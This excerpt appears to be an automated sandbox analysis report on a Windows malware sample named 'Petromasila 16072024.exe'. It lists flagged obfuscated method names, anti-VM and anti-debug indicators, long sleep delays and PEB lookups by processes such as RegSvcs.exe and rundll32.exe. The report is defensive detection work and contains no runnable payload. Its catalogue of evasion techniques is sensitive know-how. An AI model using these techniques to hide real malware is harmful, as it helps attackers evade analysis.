Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, mrltaKh45evbM110iA.cs	High entropy of concatenated method names: 'SQb1gZOM08', 'AKn1apkkn2', 'Bt51JsKpEb', 'FYT1hsx2f4', 'POF1Rfnvqj', 'pqH1lUVFhS', 'a0D1fiF0sZ', 'ufv1EnKpd3', 'MPS12dbFZb', 'QqL1wi8okf'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, dp4F9lm9Z8enGlxyCv.cs	High entropy of concatenated method names: 'beEYfeqvg', 'CBwgY22NP', 'qFPaOHWcU', 'foGLRSI8w', 'wuthNycXr', 'WYnQllwJR', 'gW8BvU4Ij2YHlqRJrT', 'VauryFOGHuwjlKVA0Q', 'seREyyn6X', 'HW1wPRQjJ'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, lt9utRDmiG8D3ch8cA.cs	High entropy of concatenated method names: 'RVNEx74gGD', 'ssEEU4NpKL', 'VqrE0JLdVx', 'sgpEeLsaYG', 'skFEFQhjcT', 'sq0EtnYFvX', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, fY7l9ryNvaeRCfddwJ.cs	High entropy of concatenated method names: 'CKm3pTYANi', 'cSy3rVrDoR', 'jdn3YFjFCM', 'qsO3gdd6a2', 'FMG3spegUv', 'kiC3aKZTEO', 'GwR3LOfJQx', 'vUR3JDJOKM', 'kO53hirKeq', 'qTi3QOj0dy'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, nOrxuqxo29JfMHvPeW.cs	High entropy of concatenated method names: 'KIuGHvqHrC', 'AUiG4QO3G2', 'Fx4GouJH4N', 'IjbG3DtQa5', 'drSGvQvk3u', 'hxxoITJN76', 'TgpoNcg0eg', 'iHSo5hYgjT', 'G2DoSu6ASJ', 'XZ5oDn6lVA'
Source: 0.2.Petromasila 16072024.exe.3ab6d38.2.raw.unpack, WoYpg8TXAcoYgsF23G.cs	High entropy of concatenated method names: 'DDe2bf3yx7', 'bJQ2OnylFa', 'TiG2iQMc1C', 'cH22MVciN1', 'UiA24p46HK', 'jXO2oLIG5G', 'lwj2G6EtUv', 'N6wE5pewTg', 'hj6ESJo7Dt', 'LUxEDgKaPb'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, l3fWsdFPv5orayaK0H.cs	High entropy of concatenated method names: 'gu6RZIAuUU', 'vjNRkyPW6H', 'AKHRFbC9Mn', 'rWeRAc17D5', 'JURRUhxEte', 'HJmR00X2Im', 'a35RebJ1pm', 'yXIRtsGCGl', 'p67RWN2JcT', 'w2ER9mi8Rq'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, ij447WzfGlGXJcuefs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xQX2uEjRVW', 'ziD2RuS83J', 'qYl2ljhfZm', 'MJF2fkTQyw', 'sgO2EQlRQV', 'IF322bcqI0', 'R5A2wErTXr'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, xFoWu4bOHCTckQjhIMe.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lHgwFCjF76', 'UcpwAukdbp', 'bPVwPQwdjF', 'aq8wK4nwts', 'E1PwIang3j', 'NYnwNfqqpI', 'IHFw5S7pnj'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, cipAF0JAF3euF3Mbjm.cs	High entropy of concatenated method names: 'sIx4Fr2cvd', 'nUE4ArcH8w', 'kN84PGsdVJ', 'Wjn4KtmT55', 'BNL4IOsdmH', 'sZ24NjYEVh', 'EGO453XgqT', 'E7u4Sww1wr', 'Y1A4DOovKg', 'uYA4TFKkhn'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, JCmbpdvjKO52nAr314.cs	High entropy of concatenated method names: 'd1ROHQybPv', 'puVOMrnLdY', 'ruuO4pLP0J', 'xexO10LMoU', 'lpbOo3E4Cd', 'J8XOGCSJ3q', 'asnO33tS34', 'jgMOvPBCAb', 'V2NO7DYZPR', 'Wc4OqYdBHe'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, meaP2Zb6GteNqA0r139.cs	High entropy of concatenated method names: 'Rw92pUJrjC', 'Mgj2r48vP0', 'SWD2YSXZ19', 'Jkl2ggft0J', 'dQI2soecOo', 'dks2aRZTvZ', 'KHZ2L6j27k', 'LBH2JMhHhN', 'dpq2hxPBf3', 'Mn42QILmlb'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, BokEBx42pDUUH2u7dd.cs	High entropy of concatenated method names: 'Dispose', 'RvubDHcq6l', 'zAwmUK07OV', 'iXill9LvFI', 'aSkbTl7Fkf', 'TrfbzaMoRn', 'ProcessDialogKey', 'mOqm6t9utR', 'ciGmb8D3ch', 'ucAmm5oYpg'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, Wkl7FkSfKrfaMoRnqO.cs	High entropy of concatenated method names: 'iXNEM0AJSw', 'JILE4bGv4I', 'amuE1wronb', 'dhZEoRdqFQ', 'z5hEGo9Ch0', 'Ds5E33ufR1', 'D6JEvZ1yG5', 'DSuE7LwijK', 'J5nEqtmvDW', 'dFSEckAaG6'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, RBlQFVNqUoxbvGX7FU.cs	High entropy of concatenated method names: 'dfUfSnf1j6', 'N9kfTyV7V5', 'yrPE6o3Y5O', 'jkqEbhs0a8', 'akRfBoNM96', 'bCDfkUg2CK', 'u8ifngBPWh', 'UvcfFv4VZl', 'lN7fA47xn3', 'mBHfP8ysLB'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, bQ69K2nFYc6fNVsP33.cs	High entropy of concatenated method names: 'FkluJJoeXL', 'TuPuhKQ4QI', 'VkHuxGoPgr', 'Qt2uUlnfGN', 'kxvue6Cb4T', 'OmautFIx1V', 'UViu9YxgMH', 'J01uCoiyjq', 'X46uZKncdi', 'YkPuB64egY'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, UX2sIR97Os4ZhG6Jq2.cs	High entropy of concatenated method names: 'F8M3MJfmpa', 'nsQ31sqAHc', 'Ic33Gh9T1a', 'jprGT8LyOK', 'kdfGzbdpkn', 'wIw36JEAXo', 'IFW3bT9C7q', 'zRy3mwVmfP', 'IFE3OGg3tI', 'net3iI72Bb'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, UIChNL1LdDgWiO8vIu.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'loSmDleCf4', 'LwkmTiFMyK', 'QYZmzcoUj9', 'WUoO6xbgKE', 'avsOb8YenO', 'T99OmMJRTt', 'JUcOOLU9r0', 'Q2u3BIQ9FyJv4to2THT'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, QsRnokQ73QSgkwusTu.cs	High entropy of concatenated method names: 'd1dosJpYjM', 'rryoLo8HSW', 't0O100ydwZ', 'rkI1eg9YtD', 'Tpe1tJBSBV', 't4L1WtLWWC', 'Vnt19eYOHQ', 'veW1C0qcMJ', 'anK1yd5qjm', 'Lut1ZxmZnB'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, XbvSrjiMhS684O5sKi.cs	High entropy of concatenated method names: 'kDmb3ipAF0', 'RF3bveuF3M', 'T45bqevbM1', 'h0ibcAnsRn', 'tusbRTucOr', 'Guqblo29Jf', 'SGY8hKKZoKS1FAQQRA', 'XLGgbOY761DQfbPMmT', 'R61bbKFkrw', 'a3pbO5CWsY'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, mrltaKh45evbM110iA.cs	High entropy of concatenated method names: 'SQb1gZOM08', 'AKn1apkkn2', 'Bt51JsKpEb', 'FYT1hsx2f4', 'POF1Rfnvqj', 'pqH1lUVFhS', 'a0D1fiF0sZ', 'ufv1EnKpd3', 'MPS12dbFZb', 'QqL1wi8okf'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, dp4F9lm9Z8enGlxyCv.cs	High entropy of concatenated method names: 'beEYfeqvg', 'CBwgY22NP', 'qFPaOHWcU', 'foGLRSI8w', 'wuthNycXr', 'WYnQllwJR', 'gW8BvU4Ij2YHlqRJrT', 'VauryFOGHuwjlKVA0Q', 'seREyyn6X', 'HW1wPRQjJ'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, lt9utRDmiG8D3ch8cA.cs	High entropy of concatenated method names: 'RVNEx74gGD', 'ssEEU4NpKL', 'VqrE0JLdVx', 'sgpEeLsaYG', 'skFEFQhjcT', 'sq0EtnYFvX', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, fY7l9ryNvaeRCfddwJ.cs	High entropy of concatenated method names: 'CKm3pTYANi', 'cSy3rVrDoR', 'jdn3YFjFCM', 'qsO3gdd6a2', 'FMG3spegUv', 'kiC3aKZTEO', 'GwR3LOfJQx', 'vUR3JDJOKM', 'kO53hirKeq', 'qTi3QOj0dy'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, nOrxuqxo29JfMHvPeW.cs	High entropy of concatenated method names: 'KIuGHvqHrC', 'AUiG4QO3G2', 'Fx4GouJH4N', 'IjbG3DtQa5', 'drSGvQvk3u', 'hxxoITJN76', 'TgpoNcg0eg', 'iHSo5hYgjT', 'G2DoSu6ASJ', 'XZ5oDn6lVA'
Source: 0.2.Petromasila 16072024.exe.6300000.4.raw.unpack, WoYpg8TXAcoYgsF23G.cs	High entropy of concatenated method names: 'DDe2bf3yx7', 'bJQ2OnylFa', 'TiG2iQMc1C', 'cH22MVciN1', 'UiA24p46HK', 'jXO2oLIG5G', 'lwj2G6EtUv', 'N6wE5pewTg', 'hj6ESJo7Dt', 'LUxEDgKaPb'
Source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, cw37txoRO4X56hm21l.cs	High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, l3fWsdFPv5orayaK0H.cs	High entropy of concatenated method names: 'gu6RZIAuUU', 'vjNRkyPW6H', 'AKHRFbC9Mn', 'rWeRAc17D5', 'JURRUhxEte', 'HJmR00X2Im', 'a35RebJ1pm', 'yXIRtsGCGl', 'p67RWN2JcT', 'w2ER9mi8Rq'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, ij447WzfGlGXJcuefs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xQX2uEjRVW', 'ziD2RuS83J', 'qYl2ljhfZm', 'MJF2fkTQyw', 'sgO2EQlRQV', 'IF322bcqI0', 'R5A2wErTXr'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, xFoWu4bOHCTckQjhIMe.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lHgwFCjF76', 'UcpwAukdbp', 'bPVwPQwdjF', 'aq8wK4nwts', 'E1PwIang3j', 'NYnwNfqqpI', 'IHFw5S7pnj'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, cipAF0JAF3euF3Mbjm.cs	High entropy of concatenated method names: 'sIx4Fr2cvd', 'nUE4ArcH8w', 'kN84PGsdVJ', 'Wjn4KtmT55', 'BNL4IOsdmH', 'sZ24NjYEVh', 'EGO453XgqT', 'E7u4Sww1wr', 'Y1A4DOovKg', 'uYA4TFKkhn'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, JCmbpdvjKO52nAr314.cs	High entropy of concatenated method names: 'd1ROHQybPv', 'puVOMrnLdY', 'ruuO4pLP0J', 'xexO10LMoU', 'lpbOo3E4Cd', 'J8XOGCSJ3q', 'asnO33tS34', 'jgMOvPBCAb', 'V2NO7DYZPR', 'Wc4OqYdBHe'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, meaP2Zb6GteNqA0r139.cs	High entropy of concatenated method names: 'Rw92pUJrjC', 'Mgj2r48vP0', 'SWD2YSXZ19', 'Jkl2ggft0J', 'dQI2soecOo', 'dks2aRZTvZ', 'KHZ2L6j27k', 'LBH2JMhHhN', 'dpq2hxPBf3', 'Mn42QILmlb'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, BokEBx42pDUUH2u7dd.cs	High entropy of concatenated method names: 'Dispose', 'RvubDHcq6l', 'zAwmUK07OV', 'iXill9LvFI', 'aSkbTl7Fkf', 'TrfbzaMoRn', 'ProcessDialogKey', 'mOqm6t9utR', 'ciGmb8D3ch', 'ucAmm5oYpg'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, Wkl7FkSfKrfaMoRnqO.cs	High entropy of concatenated method names: 'iXNEM0AJSw', 'JILE4bGv4I', 'amuE1wronb', 'dhZEoRdqFQ', 'z5hEGo9Ch0', 'Ds5E33ufR1', 'D6JEvZ1yG5', 'DSuE7LwijK', 'J5nEqtmvDW', 'dFSEckAaG6'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, RBlQFVNqUoxbvGX7FU.cs	High entropy of concatenated method names: 'dfUfSnf1j6', 'N9kfTyV7V5', 'yrPE6o3Y5O', 'jkqEbhs0a8', 'akRfBoNM96', 'bCDfkUg2CK', 'u8ifngBPWh', 'UvcfFv4VZl', 'lN7fA47xn3', 'mBHfP8ysLB'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, bQ69K2nFYc6fNVsP33.cs	High entropy of concatenated method names: 'FkluJJoeXL', 'TuPuhKQ4QI', 'VkHuxGoPgr', 'Qt2uUlnfGN', 'kxvue6Cb4T', 'OmautFIx1V', 'UViu9YxgMH', 'J01uCoiyjq', 'X46uZKncdi', 'YkPuB64egY'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, UX2sIR97Os4ZhG6Jq2.cs	High entropy of concatenated method names: 'F8M3MJfmpa', 'nsQ31sqAHc', 'Ic33Gh9T1a', 'jprGT8LyOK', 'kdfGzbdpkn', 'wIw36JEAXo', 'IFW3bT9C7q', 'zRy3mwVmfP', 'IFE3OGg3tI', 'net3iI72Bb'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, UIChNL1LdDgWiO8vIu.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'loSmDleCf4', 'LwkmTiFMyK', 'QYZmzcoUj9', 'WUoO6xbgKE', 'avsOb8YenO', 'T99OmMJRTt', 'JUcOOLU9r0', 'Q2u3BIQ9FyJv4to2THT'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, QsRnokQ73QSgkwusTu.cs	High entropy of concatenated method names: 'd1dosJpYjM', 'rryoLo8HSW', 't0O100ydwZ', 'rkI1eg9YtD', 'Tpe1tJBSBV', 't4L1WtLWWC', 'Vnt19eYOHQ', 'veW1C0qcMJ', 'anK1yd5qjm', 'Lut1ZxmZnB'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, XbvSrjiMhS684O5sKi.cs	High entropy of concatenated method names: 'kDmb3ipAF0', 'RF3bveuF3M', 'T45bqevbM1', 'h0ibcAnsRn', 'tusbRTucOr', 'Guqblo29Jf', 'SGY8hKKZoKS1FAQQRA', 'XLGgbOY761DQfbPMmT', 'R61bbKFkrw', 'a3pbO5CWsY'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, mrltaKh45evbM110iA.cs	High entropy of concatenated method names: 'SQb1gZOM08', 'AKn1apkkn2', 'Bt51JsKpEb', 'FYT1hsx2f4', 'POF1Rfnvqj', 'pqH1lUVFhS', 'a0D1fiF0sZ', 'ufv1EnKpd3', 'MPS12dbFZb', 'QqL1wi8okf'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, dp4F9lm9Z8enGlxyCv.cs	High entropy of concatenated method names: 'beEYfeqvg', 'CBwgY22NP', 'qFPaOHWcU', 'foGLRSI8w', 'wuthNycXr', 'WYnQllwJR', 'gW8BvU4Ij2YHlqRJrT', 'VauryFOGHuwjlKVA0Q', 'seREyyn6X', 'HW1wPRQjJ'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, lt9utRDmiG8D3ch8cA.cs	High entropy of concatenated method names: 'RVNEx74gGD', 'ssEEU4NpKL', 'VqrE0JLdVx', 'sgpEeLsaYG', 'skFEFQhjcT', 'sq0EtnYFvX', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, fY7l9ryNvaeRCfddwJ.cs	High entropy of concatenated method names: 'CKm3pTYANi', 'cSy3rVrDoR', 'jdn3YFjFCM', 'qsO3gdd6a2', 'FMG3spegUv', 'kiC3aKZTEO', 'GwR3LOfJQx', 'vUR3JDJOKM', 'kO53hirKeq', 'qTi3QOj0dy'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, nOrxuqxo29JfMHvPeW.cs	High entropy of concatenated method names: 'KIuGHvqHrC', 'AUiG4QO3G2', 'Fx4GouJH4N', 'IjbG3DtQa5', 'drSGvQvk3u', 'hxxoITJN76', 'TgpoNcg0eg', 'iHSo5hYgjT', 'G2DoSu6ASJ', 'XZ5oDn6lVA'
Source: 0.2.Petromasila 16072024.exe.3a2f718.1.raw.unpack, WoYpg8TXAcoYgsF23G.cs	High entropy of concatenated method names: 'DDe2bf3yx7', 'bJQ2OnylFa', 'TiG2iQMc1C', 'cH22MVciN1', 'UiA24p46HK', 'jXO2oLIG5G', 'lwj2G6EtUv', 'N6wE5pewTg', 'hj6ESJo7Dt', 'LUxEDgKaPb'

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Petromasila 16072024.exe PID: 1248, type: MEMORYSTR

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: 46B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: 6B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: 6650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: 7B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory allocated: 8B70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_01341763 rdtsc

4_2_01341763

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 9074

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.0 %

Source: C:\Users\user\Desktop\Petromasila 16072024.exe TID: 6440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1272	Thread sleep count: 118 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1272	Thread sleep time: -236000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1272	Thread sleep count: 9074 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1272	Thread sleep time: -18148000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe TID: 4552	Thread sleep time: -100000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_02B5C480 FindFirstFileW,FindNextFileW,FindClose,

6_2_02B5C480

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: rundll32.exe, 00000006.00000002.72354565366.00000000030BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: udkVsCOVUH.exe, 00000007.00000002.72354914260.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: firefox.exe, 00000008.00000002.68227992878.000002190DF46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_01341763 rdtsc

4_2_01341763

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_00417993 LdrLoadDll,

4_2_00417993

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF13E mov eax, dword ptr fs:[00000030h]	4_2_013BF13E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138A130 mov eax, dword ptr fs:[00000030h]	4_2_0138A130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01337128 mov eax, dword ptr fs:[00000030h]	4_2_01337128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01337128 mov eax, dword ptr fs:[00000030h]	4_2_01337128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01330118 mov eax, dword ptr fs:[00000030h]	4_2_01330118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
